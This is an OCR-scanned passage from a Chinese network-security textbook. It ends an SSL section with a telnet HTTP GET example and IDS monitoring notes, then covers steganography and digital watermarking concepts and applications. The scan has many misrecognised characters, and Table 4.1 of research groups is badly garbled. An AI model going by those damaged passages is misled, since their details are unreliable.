用 户 可 以 利用 Telnet 连 到 网 页 服务 器 的 80 端口 ,然后 下 达 如 下 的 http get 指令 ,从 网 页 服 
务 器 取得 网 页 。 举 例如 下 : 
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telnet www. ramsec. com 80 

Trying 216.182. 36. 154... 

Connected to www. ramsec. com 

Escape character is '~]' 

GET / HTTP/1.0 

HTTP/1.1 200 OK 

Server: Microsoft- IIS/4.0 

Content - Location: http://216.182.36.154/index. html 

Date: Mon,10 Jul 2000 11:43:59 GMT 

Content — Type: text/html 

Accept — Ranges: bytes 

Last — Modified: Thu,23 Mar 2000 01:41:15 GMT 

ETag: "305fc7e06894bf1 :38441" 

Content - Length: 886 

ldoctype html public " - //w3c//dtd html 4.0 transitional//en"> 
<htnml> 

<head> 

<meta http - equiv = "Content - Type”" content = "text/html; 
Charset = iso- 8859-1"> 


因为 SSL 通 连 必须 要 经 过 一 个 安全 的 连接 端口 ,而 在 这 里 使 用 的 是 没有 安全 防护 的 连 
接 端口 80 ,因此 ,这 个 技巧 在 HTTPS 通信 协议 上 是 行 不 通 的 。 然 而 ,如 果 用 的 是 Open 
SSL 程序 ,就 可 以 在 SSL 连接 上 做 同样 的 一 件 事情 。 

通过 上 面 Open SSL 这 项 技术 ,就 可 以 直接 传输 资料 到 有 SSL 保护 的 网 站 ,然后 用 一 
般 审 查 任何 HTTP 服务 器 安全 性 的 方式 来 审查 这 个 SSL 网 页 服务 器 。 


3. 监测 SSL 服务 器 


现在 的 网 络 IDS 只 能 够 监视 纯 文 字 资料 内 容 , 所 以 只 能 够 有 两 项 选择 : 监视 服务 器 上 
的 SSL 连接 或 者 将 整个 连接 资料 转 为 纯 文字 格式 。 大 部 分 的 网 页 服务 器 都 有 一 些 基 本 的 
日 志 记录 功能 。 例 如 : Microsoft 的 IIS Web Server 有 内 建 的 日 志 制作 功能 ,使 用 的 是 
W3svcl 格式 , 它 可 以 侦 测 到 很 多 一 般 的 网 络 攻 击 状况 。 

除了 检查 主机 日 志文 件 以 外 , 另 一 个 方式 是 将 SSL 连接 转换 成 纯 文字 格式 。 这 样 网 
络 的 IDS 就 能 够 监视 资料 往来 。 有 几 种 产品 提供 这 项 功能 ,不 过 它们 主要 是 为 了 要 提升 
数据 处 理 效率 ,而 不 是 为 了 提高 网 络 安全 的 目的 。 用 户 可 以 将 IDS 置 放 于 加 速 器 跟 网 页 
服务 器 之 间 , 以 监控 纯 文 字 格式 的 网 络 通信 。 用 这 种 监控 方式 ,要 求 用 户 必 须 有 至 少 一 
个 网 络 区 隔 (network segment) 。 这 个 网 络 区 隔 必 须 是 安全 的 ,而 且 与 其 他 的 网 络 装置 分 
升 来 * 

总 之 ,SSL 仍然 不 失 为 一 套 全 面 完善 的 安全 策略 中 有 效 的 组 成 元 素 。 然 而 ,与 网 络 安 
全 的 其 他 工具 软件 一 样 , 仅 使 用 单一 的 防护 软件 是 无 效 的 。 对 SSL 的 过 高 评价 有 可 能 带 来 
安全 风险 。 它 仅 是 网 络 安全 工具 的 一 种 ,必须 和 其 他 网 络 安全 工具 紧密 结合 ,才能 构造 出 全 
面 、 完 善 、 安 全 可 靠 的 网 络 。 


过 


mm 
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. 什么 是 SSL? 


什么 是 证 书 ? 证 书 有 哪些 用 途 ? 


. 在 HTTPS( 通 过 SSL 的 HTTP) 身 份 验证 中 使 用 的 两 种 证 书 是 什么 ? 
.SSL 协议 的 两 个 组 成 部 分 分 别 是 什么 ? 
.如 何 结合 SSL 安全 协议 搭建 一 个 网 站 ? 


第 4 章 信息 隐藏 技术 


随 着 人 们 网 络 安 全 意识 的 增强 以 及 密码 破解 技术 的 发 展 ,人 们 已 经 越 来 
越 不 满足 于 简单 的 数据 加 密 技术 的 应 用 ,近年 来 信息 隐藏 技术 得 到 飞速 的 发 
展 和 应 用 。 

本 章 要 点 如 下 : 

。 信息 隐藏 技术 的 现状 、 特 点 以 及 发 展 趋势 ; 

。 数字 水 印 技术 ; 

。 信 息 隐藏 技术 的 应 用 ; 

。 信 息 隐藏 技术 的 应 用 软件 。 


4.1 信息 隐藏 技术 概述 


信息 隐藏 的 思想 起 源 于 隐 写 术 (steganograpby) , 它 是 一 种 将 秘密 信息 隐 
藏 在 某 些 宿 主 对 象 中 , 且 信 息 在 传输 或 存储 过 程 中 不 被 发 现 或 引起 注意 , 接 
收 者 获得 隐藏 对 象 后 按照 约定 规则 可 读 取 秘密 信息 的 技术 。 人 类 对 信息 隐 
藏 技术 的 应 用 可 以 追溯 到 几 千 年 前 的 远古 时 代 , 后 来 人 们 把 信息 隐藏 技术 归 
纳 为 技术 隐 写 术 和 语义 隐 写 术 , 但 信息 隐藏 的 具体 方法 却 不 尽 相 同 ,尤其 是 
现代 信息 隐藏 技术 ,已 具有 鲜明 的 时 代 特 征 。 


41.1 信息 隐藏 技术 的 发 展 


早期 比较 典型 的 技术 隐 写 术 是 将 秘密 传递 的 信息 记录 下 来 ,隐藏 在 特定 
媒介 中 ,然后 再 传送 出 去 的 一 种 技术 。 采 用 技术 隐 写 术 方 法 的 实例 有 很 多 ， 
比如 ,将 信息 隐藏 在 信使 的 鞋底 或 封装 在 蜡 丸 中 ,而 隐 写 墨水 \ 纸 币 中 的 水 印 
和 缩微 图 像 技术 也 陆续 出 现在 军事 应 用 中 。 

语义 隐 写 术 则 是 将 记录 这 个 行为 本 身 隐 藏 起 来 ,信息 由 隐藏 的 * 写 ?语言 
和 语言 形式 所 组 成 ,一 般 依 赖 于 信息 编码 。 十 六 七 世纪 涌现 了 许多 关于 语义 
隐 写 术 的 著作 ,斯 科 特 提 出 的 扩展 AveMaria 码 就 是 一 种 典型 的 语义 隐 写 方 
法 。 语 义 隐 写 方法 很 多 ,如 用 音符 替代 字符 在 乐谱 中 隐藏 信息 ,用 咒语 代表 
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字 隐 藏 信息 ,还 有 用 点 、 线 和 角度 在 一 个 几何 图 形 中 隐藏 信息 等 ,而 离合 诗 则 是 另 一 种 广泛 
使 用 在 书刊 等 文字 中 的 隐藏 信息 方法 。 

但 由 于 人 类 早期 缺乏 必要 的 理论 基础 和 系统 研究 ,对 于 信息 的 保密 往往 更 多 是 单纯 地 
借助 于 密码 技术 ,所 以 隐 写 术 始终 没有 成 为 一 门 独立 的 学 科 ,发展 一 直 比 较 缓慢 。 

当今 信息 技术 和 计算 机 技术 得 到 空前 发 展 ,出 现 了 许多 朵 新 的 信息 隐藏 技术 。 这 些 技 
术 不 但 隐藏 了 信息 的 内 容 , 而 且 隐 藏 了 信息 的 “存在 ”, 因 此 得 到 了 广泛 的 应 用 和 发 展 。 

除 学 术 界 的 研究 外 ,商业 公司 也 开发 出 一 些 信息 隐藏 软件 。 如 : DiSi-Stega Nograph、 
EZStego 、Gif-ItUp v1.0、Hide and Seek (Colin Maroney) \JPEG-JSTEG (Derek Upham) 、 
MP3Stego(Fabien A. P. Petitcolas, Computer Laboratory, University of Cambridge)、 
Nicetext( Mark Chap-man and George Davida, Department of EE & CS, University of 
Wisconsin Milwaukee) 等 。 

一 方面 这 些 隐 写 软件 为 人 们 进行 秘密 通信 、 防 止 机 密 流 失 提供 了 通信 手段 , 另 一 方面 也 
为 一 些 恶意 的 个 人 或 团伙 进行 各 种 非法 活动 提供 了 便利 。 

信息 隐藏 技术 也 将 是 未 来 信息 战 对 抗 的 焦点 之 一 ,是 敌对 双方 借以 获取 和 破解 对 方 隐 
项 通信 的 制高点 。 未 来 对 信息 隐藏 技术 的 研究 将 侧重 于 以 下 两 个 方面 : 

(1) 理论 体系 研究 

信息 隐藏 还 没有 一 个 完整 的 理论 体系 ,许多 核心 问题 尚 待 解决 。 如 信息 隐藏 容量 的 极 
限 是 多 少 , 如 何 更 好 地 隐藏 信息 ,如 何 对 隐藏 信息 进行 检测 .恢复 去除。 如 何 建立 统一 的 信 
息 隐 藏 理论 体系 。 建 立 完整 的 信息 隐藏 理论 体系 对 于 隐藏 信息 检测 的 研究 具有 指导 作用 。 

(2) 隐 写 的 发 现 与 反 发 现 研究 

近 几 年 国内 许多 学 者 也 相继 开展 了 信息 隐藏 方面 的 研究 ,国家 有 关 科 技 发 展 部 门 也 日 
益 重 视 此 方面 的 研究 。1999 年 国家 自然 科学 基金 委员 会 政策 局 等 组 织 有 关 专 家 ,在 北京 市 
九 华山 庄 组 织 召 开 了 网 络 计算 和 信息 安全 论坛 ,强调 了 研究 信息 伪装 的 重要 性 ,与 会 专家 建 
议 基金 会 在 “十 五 ”期 间 重点 关注 包括 数字 水 印 在 内 的 网 络 环 境 下 的 信息 安全 领域 的 研究 。 
2000 年 ,又 在 北京 召开 了 信息 安全 方面 的 会 议 ,将 信息 安全 确定 为 优先 资助 领域 。 国 家 重 
点 基础 研究 *973” 计 划 也 有 信息 隐藏 方面 的 专项 课题 。 


412 信息 隐藏 模型 


信息 隐藏 (information hiding) 不 同 于 传统 的 密码 学 技术 。 传 统 的 密码 学 技术 主要 是 研 
究 如 何 将 机 密 信息 进行 特殊 的 编码 ,以 形成 不 可 识别 的 密码 形式 ( 密 文 ) 进 行 传递 ; 而 信息 
隐藏 则 主要 研究 如 何 将 某 一 机 密 信息 秘密 隐藏 于 另 一 公开 的 信息 中 ,然后 通过 公开 信息 的 
传输 来 传递 机 密 信息 。 对 加 密 通信 而 言 , 可 能 的 监测 者 或 非法 拦截 者 可 通过 截取 密 文 ,并 对 
其 进行 破译 或 将 密 文 进行 破坏 后 再 发 送 , 从 而 影响 机 密 信息 的 安全 ; 但 对 信息 隐藏 而 言 , 可 
能 的 监测 者 或 非法 拦截 者 则 难以 从 公开 信息 中 判断 机 密 信息 是 否 存 在 ,难以 截获 机 密 信息 ， 
从 而 保证 机 密 信息 的 安全 。 多 媒体 技术 的 广泛 应 用 ,为 信息 隐藏 技术 的 发 展 提供 了 更 加 广 
阔 的 空间 。 

待 隐藏 的 信息 称 为 秘密 信息 (secret message) , 它 可 以 是 版 权 信 息 或 秘密 数据 ,也 可 以 
是 一 个 序列 号 ; 而 公开 信息 则 称 为 载体 信息 (cover message) ,如 视频 .音频 片段 。 这 种 信息 
隐藏 过 程 一 般 由 密 钥 (key) 来 控制 , 即 通过 嵌入 算法 (Embedding Algorithm) 将 秘密 信息 隐 


52 | 
贺 络 与 信息 安全 基础 


藏 于 公开 信息 中 ,而 隐蔽 载体 (隐藏 有 秘密 信息 的 公开 信息 ) 则 通过 信道 (communication 
channel) 传 输 , 然 后 检测 器 (detector) 利 用 密 钥 从 隐蔽 载体 中 恢复 /检测 出 秘密 信息 。 

信息 隐藏 技术 主要 由 下 述 两 部 分 组 成 :信息 嵌入 算法 , 它 利 用 密 钥 来 实现 秘密 信息 的 隐 
藏 。 隐 项 信息 检测 /提取 算法 (检测 器 ), 它 利用 密 钥 从 隐藏 载体 中 检测 /恢复 出 秘密 信息 。 在 
密 钥 未 知 的 前 提 下 ,第 三 者 很 难 从 隐秘 载体 中 得 到 或 删除 秘密 信息 ,甚至 不 能 发 现 秘密 信息 。 


413 信息 隐藏 的 特点 


信息 隐藏 的 目的 不 在 于 限制 正常 的 资料 存 取 , 而 在 于 保证 隐藏 数据 不 被 侵犯 和 发 现 。 
因此 ,信息 隐藏 技术 必须 考虑 正常 的 信息 操作 所 造成 的 威胁 , 即 要 使 机 密 资料 对 正常 的 数据 
操作 技术 具有 人 免疫 能 力 。 这 种 免疫 力 的 关键 是 要 使 隐藏 信息 部 分 不 易 被 正常 的 数据 操作 
(如 通常 的 信号 变换 操作 或 数据 压缩 所 破坏 。 根 据 信息 隐 藏 的 目的 和 技术 要 求 , 该 技术 具 
有 以 下 一 些 特 性 。 


1. 鲁 棒 性 (robustness) 


鲁 棱 性 指 不 因 图 像 文件 的 某 种 改动 而 导致 隐藏 信息 丢失 的 能 力 , 这 里 所 谓 “ 改 动 " 包 括 
传输 过 程 中 的 信道 噪声 、 滤 波 操作 、 重 采样 有 损 编码 压缩 D/A 或 A/D 转换 等 。 


2. 不 可 检测 性 (undetectability) 


不 可 检测 性 指 隐 蔽 载体 与 原始 载体 具有 一 致 的 特性 ,如 具有 一 致 的 统计 噪声 分 布 等 ,以 
便 使 非法 拦截 者 无 法 判断 是 否 有 隐蔽 信息 。 


3. 透明 性 Cinvisibility) 


利用 人 类 视觉 系统 或 人 类 听觉 系统 ,经 过 一 系列 隐藏 处 理 ,使 目标 数据 没有 明显 的 降 质 
现象 ,而 隐藏 的 数据 却 无 法 制 直接 看 见 或 听见 。 


4. 安全 性 (security) 


安全 性 指 隐 藏 算法 有 较 强 的 抗 攻击 能 力 , 即 它 必须 能 够 承受 一 定 程度 的 人 为 攻击 ,而 使 
隐藏 信息 不 会 被 破坏 。 


5. 自 恢复 性 


由 于 经 过 一 些 操作 或 变换 后 ,可 能 会 使 原 图 产生 较 大 的 破坏 ,如 果 只 从 留 下 的 片段 数 
据 , 仍 能 恢复 隐藏 信号 ,而且 恢复 过 程 不 需要 宿主 信号 ,这 就 是 所 谓 的 自 恢复 性 。 

信息 隐藏 学 是 一 门 新 兴 的 交叉 学 科 ,在 计算 机 、 通 信 、 保 密 学 等 领域 有 着 广阔 的 应 用 前 
景 。 数 字 水 印 技术 作为 其 在 多 媒体 领域 的 重要 应 用 ,已 受到 人 们 越 来 越 多 的 重视 。 


4.2 数字 水 印 技术 


在 1994 年 召开 的 IEEE 国际 图 像 处 理会 议 (ICIP"94) 上 ,R. G. Schyndel 等 人 第 一 次 明 
确 提 出 了 “数字 水 印 ” 的 概念 ,从 此 掀起 了 现代 信息 隐藏 技术 研究 的 高 潮 。 仅 仅 过 了 两 年 ,在 
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ICIP'96 上 ,已 经 出 现 了 以 信息 隐藏 领域 中 的 水 印 技术 、 版 权 保护 (copyright protection) 和 
多 媒体 服务 的 存 取 控制 (access control of multimedia services) 为 主要 内 容 的 研讨 专题 。 

从 1994 年 开始 ,国际 学 术 界 开始 陆续 发 表 有 关 数 字 水 印 的 文章 , 且 文 章 数量 呈 快 速 增长 
趋势 。 一 些 有 影响 的 国际 会 议 ( 如 IEEE ICIP、IEEE ICASSP、ACM Multimedia 等 ) 以 及 一 些 国 
际 权 威 杂 志 ( 如 Signal Processing、IEEE Journal of Selected Areason Communication 、 
Communications of ACM 等 ) 相 继 出 版 了 数字 水 印 的 专辑 。 数 字 图 书馆 、 网 上 发 行 、 网 络 美 
术 馆 、 写 真 收藏 和 彩信 等 新 概念 层出不穷 ; MIDI.CD、VCD、DVD 和 MP3 等 数字 化 产品 让 
人 目不暇接 。 仅 靠 密码 技术 是 不 能 完成 多 媒体 数据 的 加 密 、 认 证 和 保护 的 ,数字 水 印 技术 在 
数据 安全 中 已 经 占有 不 可 替代 的 地 位 。 以 DVD 为 例 , 参 与 研究 其 版 权 保护 水 印 的 就 有 包 
括 IBM、NEC、Sony 在 内 的 数 十 家 大 型 企业 。 但 是 出 版 商 在 利用 数字 水 印 保护 版 权 的 同 
时 ,盗版 者 也 在 千方百计 地 想 办 法 来 去 除 版 权 标记 ,为 了 更 好 地 保护 版 权 , 开 发 出 更 健壮 的 
水 印 算法 是 当前 的 研究 趋势 。 

德国 已 经 研究 了 在 打印 和 印刷 的 纸 介质 证 件 中 加 入 隐藏 标记 的 技术 ,用 数字 水 印 防止 
伪造 电子 照片 。 目 前 ,研究 该 技术 的 研究 所 正在 开发 另 一 种 新 的 系统 ,新 系统 既 可 在 照片 上 
加 上 牢固 的 数字 水 印 ,也 可 以 经 改动 让 数字 水 印 消失 ,使 任何 伪造 企图 都 无 法 得 偿 。 美 国 
Digimarc 公司 率先 推出 了 世界 上 第 一 个 商用 数字 水 印 软件 ,而 后 又 以 插件 形式 将 该 软件 集 
成 到 Adobe Photoshop 和 Corel Draw 图 像 处 理 软 件 中 。 随 后 ,Digimarc 公司 又 推出 了 一 系 
列 数字 水 印 产品 。 商 标 保 护 (brand protection) 技 术 通 过 将 保密 特征 加 入 到 产品 包装 的 设 
计 中 ,就 可 以 在 产品 流通 链 的 任何 环节 中 进行 产品 的 认证 ,辨别 原 版 和 复制 版 .防止 产品 伪 
造 ,并 且 能 够 通过 供应 链 来 跟踪 产品 的 流通 。 安 全 文档 (secure document) 技 术 将 Digimarc 
的 水 印 特征 加 入 到 重要 的 文档 之 中 ,以 此 来 确认 文档 的 真 伪 性 ,辨别 原版 文档 和 复制 文档 ， 
防止 未 授权 的 文档 复制 及 确认 原始 文档 的 授权 应 用 等 。 在 打印 机 、 复 印 机 中 利用 数字 水 印 
增加 控制 信息 以 限制 打印 的 技术 也 正在 研制 中 。 美 国 财政 部 已 委托 麻 省 理工 学 院 媒 体 实验 
室 研究 在 彩色 打印 机 、 复 印 机 输出 的 每 幅 图 像 中 加 入 唯一 的 \ 不 可 见 的 数字 水 印 ,通过 实时 
地 从 扫描 票据 中 判断 水 印 的 有 无 ,快速 辨识 真 伪 。IBM 东京 研究 实验 室 提 出 了 用 数据 隐藏 
(data hiding) 作 为 解决 方案 来 鉴定 数字 化 照片 的 来 源 , 证 实数 字 化 照片 的 完整 性 ,判断 照片 
是 否 被 自 改 以 及 定位 自 改 的 地 方 。IBM 东京 研究 实验 室 与 Yasuda Fire & Marine (YFM) 
公司 联合 开发 了 一 种 作为 安全 电子 保险 索赔 的 照片 安全 存档 和 传输 系统 的 样机 。 该 系统 能 
协助 地 方 服 务 部 门 进行 汽车 损失 索赔 工作 , 当 索 赔 服务 部 门 的 调解 员 或 修理 厂 的 雇员 使 用 
这 种 安全 数码 相机 和 微型 闪存 器 给 一 辆 损坏 的 汽车 拍照 片 , 再 利用 安全 图 像 编 档 和 传输 系 
统 记录 这 些 照片 时 ,服务 部 门 的 经 理 和 核算 员 就 能 够 检查 这 张 照 片 , 并 判断 它 是 否 用 认证 的 
照相 机 拍摄 ,是 否 有 任何 未 被 授权 的 更 改 。 该 安全 电子 索赔 处 理 系 统 可 运行 于 Lotus Notes 
系统 。 

数字 水 印 开辟 了 一 条 和 靳 新 的 信息 安全 途径 ,其 不 可 感知 的 隐蔽 性 和 抵抗 各 种 攻击 的 能 
力 可 以 实现 数字 产品 的 完整 性 保护 和 算 改 鉴定 ,还 可 用 于 数字 防伪 。 数 字 水 印 必 将 成 为 数 
字 作 品 的 版 权 保护 和 真 伪 认 证 的 核心 技术 措施 之 一 ,并 在 电子 商务 交易 中 发 挥 不 可 替代 的 
作用 。 在 市 场 经 济 飞速 发 展 的 今天 ,对 于 企业 形象 和 经 济 利益 存在 严重 受 损 的 企业 和 数字 
产品 被 侵权 的 创作 者 来 说 ,这 无 疑 是 一 个 良好 的 解决 方案 。 数 字 水 印 及 其 应 用 技术 不 仅 提 
供 了 突破 性 的 信息 安全 防护 方式 ,而 且 在 数字 防伪 中 占据 着 重要 的 地 位 。 它 对 维护 国家 经 
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济 秩序 大 有 益处 。 表 4. 1 给 出 了 M. Kutter 所 整理 的 一 些 国际 上 从 事 数字 水 印 方面 研究 的 
研究 小 组 情况 。 这 些 研 究 小 组 及 公司 都 有 有 关 数 字 水 印 及 信息 隐藏 方面 的 商业 软件 。 读 者 
也 可 从 中 免费 获得 一 些 软 件 和 源码 。 


表 4.1 部 分 信息 隐藏 软件 情况 表 


研究 机 构 研究 内 容 负 责 人 
NEC = Ingemar J. Cox 
Universita degli Studi di Firenze LP Alessandro Piva 
IBM 区 辣 司 Boon-Lock Yeo 
Univ. of Geneva 二 Joe O Ruanaidh 
University of Erlangen _PIA Frank Hartung 
MIT-Meadi Lab 本 都 大 Josh Smith Nice 
Columbia Univ. F Marc Schneider Nicely 
Purdue Univ. Re Delp & Wolfgang 
Curtin University EE 并 Sebastien Wong 
TU Delft Pl Gerhard C. Langelaar 
Univ. Thessaloniki,Greece 医 、- 六 旭 Prof. Pitas 
Los lamos Nat. Lab. T_PSL Stanford ,et al. 
Computer Lab. ,U. of Cambridge LA Petitcolas 


表 4. 1 中 的 内 容 栏 中 各 字母 的 含义 如 下 : 
。 工 表示 有 关 水 印信 息 的 指南 ; 

。 工 表示 链接 到 数字 水 印 主 页 ; 

P 表示 有 文章 可 下 载 ; 

。 S 表示 有 软件 可 下 载 ; 

。 工 表示 图 像 水 印 ; 

V 表示 视频 水 印 ; 

。 A 表示 音频 水 印 。 


4.3 信息 隐藏 技术 的 应 用 


信息 隐藏 技术 作为 一 种 新 兴 的 信息 安全 技术 已 经 被 许多 应 用 领域 所 采用 。 当 信息 隐藏 
技术 应 用 于 保密 通信 和 领域 时 , 称 为 隐蔽 通信 或 低 截获 概率 通信 ; 当 应 用 于 Internet 秘密 信 
息 传输 时 , 常 被 称 为 隐 写 术 ; 当 应 用 于 版 权 保护 时 通常 被 称 为 数字 水 印 技术 。 


43.1 数字 内 容 保护 


网 络 环境 下 ,数字 媒体 易于 复制 ,传播 的 特点 使 得 版 权 保护 的 重要 性 日 益 突出 ,因此 越 
来 越 多 的 数字 视频 、 声 频 信号 及 图 像 被 * 贴 "上 了 不 可 见 的 标签 ,这 些 标签 往往 携带 隐藏 了 的 
版 权 标志 或 序列 号 以 防止 非法 复制 。 数 字 水 印 技术 作为 数字 产品 版 权 保护 的 潜在 有 效 手 
段 ,已 成 为 国际 学 术 界 与 企业 界 广泛 关注 的 焦点 。 数 字 水 印 是 携带 所 有 者 版 权 信息 的 数据 ， 
被 永久 地 融合 到 数字 产品 中 。 它 可 以 作为 版 权 争端 的 法 律 凭证 ,用 来 指控 盗版 者 ,可 以 确立 
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版 权 所 有 者 ,识别 购买 者 或 者 提供 有 关 数 字 内 容 的 其 他 附加 信息 ,并 将 这 些 信息 以 不 可 感知 
的 方式 嵌入 到 数字 图 像 .数字 音频 和 视频 序列 中 ,用 于 确认 所 有 权 , 验 证 数据 完整 性 。 具 体 
如 下 。 


1. 证 件 防伪 


数字 水 印 技术 可 有 效 防止 证 件 被 伪造 。 以 制作 个 人 身份 证 为 例 , 一 般 要 经 过 照片 扫描 、 
签名 、 制 证 机 输入 ,打印 和 塑封 等 过 程 。 上 述 新 技术 是 在 打印 证 件 前 ,在 照片 上 附加 一 个 暗 
藏 的 数字 水 印 ,处 理 后 的 照片 用 肉眼 看 与 原来 完全 一 样 ,必须 用 专门 的 扫描 器 才能 检测 出 数 
字 水 印 。 这 种 方法 可 以 迅速 无 误 地 确定 证 件 的 真 伪 。 


2. 商标 保护 


该 技术 通过 将 保密 特征 加 入 到 产品 包装 的 设计 中 ,可 以 在 产品 流通 链 的 任何 环节 中 进行 
产品 的 认证 .辨别 原版 和 复制 版 .防止 产品 被 伪造 ,并 且 能 够 通过 供应 链 来 跟踪 产品 的 流通 。 


3. 安全 文档 


将 水 印 特征 加 入 到 重要 的 文档 之 中 ,以 此 来 确认 文档 的 真 伪 性 ,辨别 原版 文档 和 复制 文 
档 ,防止 未 授权 的 文档 复制 及 确认 原始 文档 的 授权 应 用 等 。 这 些 文档 包括 银行 支票 护照 、 
债券 .身份 证 ,塑料 卡片 邮票、 驾照 ,证书 、 票 据 、 报 表 和 包装 等 。 


4. 数据 完整 性 验证 


脆弱 水 印 是 指 对 某 些 处 理 稳健 而 对 其 他 处 理 脆弱 的 水 印 。 该 技术 可 以 验证 数据 是 否 被 
自 改 。 它 与 签名 等 密码 技术 的 区 别 在 于 该 技术 允许 根据 实际 应 用 场景 对 数据 进行 处 理 , 而 
密码 技术 则 认为 对 数据 的 任何 处 理 都 是 筑 改 。 比 如 ,在 互联 网 上 传输 图 像 . 音 视频 流 这 种 大 
数据 量 时 都 先 要 进行 必要 的 压缩 ,这 时 在 传输 之 前 加 入 一 种 能 够 抵抗 压缩 的 脆弱 水 印 ,使 对 
数据 的 任何 其 他 处 理 都 可 能 导致 水 印 的 破坏 ,从 而 证 明 数据 的 完整 性 。 


432 隐蔽 通信 


把 需要 传递 的 秘密 信息 嵌入 到 公开 的 媒体 中 ,这 将 有 效 地 减少 遭受 攻击 的 可 能 性 。 如 
果 再 结合 密码 学 的 方法 ,即使 敌 方 知道 秘密 信息 的 存在 ,要 提取 和 破译 信息 也 是 十 分 困难 
的 。 替 音 电话 技术 就 是 把 需要 传递 的 秘密 语音 信息 加 密 后 嵌入 到 公开 线路 的 音频 中 ,窃听 
者 听 到 的 是 无 关 紧 要 的 对 话 。 隐 项 通信 对 稳健 性 要 求 较 低 ,主要 是 需要 抵抗 未 经 授权 的 访 
问 、 模 数 和 数 模 转换 等 信息 传输 过 程 中 遇 到 的 正常 处 理 。 匿 名 通信 也 是 信息 隐藏 在 隐蔽 通 
信和 领域 中 的 应 用 。 所 谓 匿名 通信 就 是 寻找 各 种 途径 来 隐藏 通信 消息 的 主体 , 即 消 息 的 发 送 
者 和 接收 者 。 在 医用 数字 图 像 与 通信 标准 中 ,图 像 数 据 与 患者 姓名 、 图 像 拍摄 日 期 和 诊断 医 
生 等 说 明 内 容 是 相互 分 离 的 。 有 时 候 会 发 生 患 者 病情 资料 被 暴露 或 丢失 的 现象 ,利用 信息 
隐藏 技术 将 患者 的 个 人 资料 嵌入 到 图 像 数据 中 ,就 可 以 避免 这 些 情况 的 发 生 。 另 外 ,匿名 电 
子 选举 ,匿名 消息 广播 也 是 匿名 通信 的 实例 。 

目前 在 Internet 上 已 经 发 布 了 200 多 种 隐 写 软件 ,而 且 每 个 月 都 有 新 的 隐 写 软件 或 新 
版 本 出 现 。 另 外 ,Internet 上 发 布 的 隐 写 软件 的 数目 各 个 国家 并 不 平衡 ,其 中 来 自 北美 的 隐 
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写 软 件 占 60% ,欧洲 占 30%% ,日 本 中国、 韩国 印度、 澳大利亚 和 俄罗斯 共 占 10%。 隐 秘 术 
的 飞速 发 展 可 归结 为 以 下 6 点 原因 。 

Q@ 军事 和 其 他 一 些 情报 机 构 需 要 “低调 ”的 通信 手段 。 即 使 对 消息 的 内 容 加 密 , 现 代 战 
场 上 对 这 些 敏感 信号 的 检测 也 可 能 导致 对 发 送 方 的 快速 反击 。 因 此 , 军 方 通信 往往 采用 诸 
如 发 散 谱 调制 或 者 大 气 散射 等 信号 传输 技术 ,保证 信号 不 易 被 敌 方 发 现 或 者 干扰 。 

@ 犯罪 分 子 也 关注 和 采用 一 些 * 隐 项 ”的 通信 手段 。 他 们 乐于 使 用 预付 费 的 移动 电话 、 
修改 过 身份 的 移动 电话 ,甚至 侵入 交换 机 使 得 电话 可 以 改变 通信 线路 。 

@ 执法 与 反 情 报 机 关 等 也 关注 这 些 技术 以 及 它们 的 弱点 ,从 而 达到 发 现 和 跟踪 隐藏 信 
息 的 目的 。 

@ 有 些 政府 也 尝试 限制 在 线 自由 交谈 和 民间 使 用 加 密 技 术 , 因 此 也 激发 了 人 们 致力 于 
发 展 Internet 上 匿名 通信 (如 匿名 邮件 中 转 站 和 代理 服务 器 ) 的 热情 。 

@ 电子 选举 .电子 货币 .病人 病灶 图 像 等 也 使 用 匿名 技术 。 

@ 计算 机 的 普及 和 网 络 的 发 展 以 及 信息 时 代 的 到 来 ,为 隐蔽 通信 创造 了 生存 环境 。 


433 安全 监测 


将 对 媒体 的 控制 信息 隐藏 其 中 ,结合 媒体 访问 终端 可 以 实现 数据 分 级 访问 .数据 跟踪 和 
监测 .商业 和 视频 广播 .互联 网 数字 媒体 服务 付费 .电子 商务 的 认证 鉴定 等 目的 。 具 体 如 下 。 


1. 数字 权限 管理 


欧洲 委员 会 DG 下 计划 制定 了 网 络 数字 产品 的 知识 产权 保护 (IPR) 认 证 和 保护 体系 标准 ， 
简 记 为 IMPRIMATUR 。 该 安全 数字 水 印 体 系 规定 了 在 Internet 这 种 开放 环境 中 利益 联系 的 
实体 .可 信任 第 三 方 . 加 载 和 检验 水 印 的 实体 .各 个 实体 的 责任 .应 遵守 的 协议 等 ,是 一 套 严 
密 完整 的 保护 数字 产品 版 权 的 体系 标准 。 以 为 用 户 提供 便捷 的 数字 音乐 在 线 访问 ,保护 数 
字音 乐 的 版 权 , 促进 与 音乐 相关 的 产业 和 技术 的 健康 发 展 为 宗旨 的 SDMI(The Secure 
Digital Music Initiative) 组 织 在 制定 开放 技术 规范 时 把 水 印 技术 作为 版 权 保 护 的 手段 。 
MPEG4 IPMP 是 基于 MPEG4 的 数字 视 音频 版 权 保护 系统 ,是 MPEG 组 织 提供 的 在 不 同 
领域 的 多 种 产品 和 服务 的 基础 安全 框架 (IPMP-ES) 和 标准 化 的 IPMP 界面 (IPMP-DS) ,其 
基本 的 IPMP 系统 也 是 采用 数字 水 印 技术 实 现 访问 控制 等 用 户 功能 。 


2. 媒体 桥 技术 


通过 在 杂志 广告 ,产品 包装 、 目 录 甚 至 各 类 票据 中 隐藏 不 可 见 的 数字 水 印 ,用 户 只 要 将 
这 些 传统 媒体 放 在 网 络 摄像 机 (Web Camera) 前 ,媒体 桥 技 术 就 可 以 直接 将 用 户 带 到 与 印刷 
图 像 内容 相 关联 的 网 络 站 点 ,省 去 了 用 户 殴 击 键盘 和 点 击 鼠标 的 过 程 。 例 如 ,将 登 有 广告 的 
杂志 置 于 网 络 摄像 机 前 ,媒体 桥 技 术 会 立即 在 计算 机 上 显示 出 广告 公司 的 主页 和 广告 中 产 
品 的 相关 信息 , 免 去 了 用 浏览 器 在 网 上 搜索 的 过 程 。 这 种 方式 可 以 使 出 版 商 .广告 商 和 图 像 
应 用 者 增加 其 产品 的 附加 值 。 


3. 打印 控制 
打印 控制 是 指 在 打印 机 、 复 印 机 中 利用 数字 水 印 增 加 控制 信息 以 限制 打印 的 技术 。 通 
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过 在 文档 中 加 入 水 印信 息 控制 打印 机 、 复 印 机 的 打印 或 复印 次 数 等 。 
4. 播放 控制 


在 音频 、 视 频 播放 器 中 加 入 水 印 控制 功能 限制 用 户 对 内 容 的 使 用 权限 。 只 有 购买 特定 
权限 的 用 户 才能 够 获得 相应 的 使 用 权 ,如 播放 、 剪 辑 等 。 


5. 电影 分 级 和 多 语言 电影 系统 


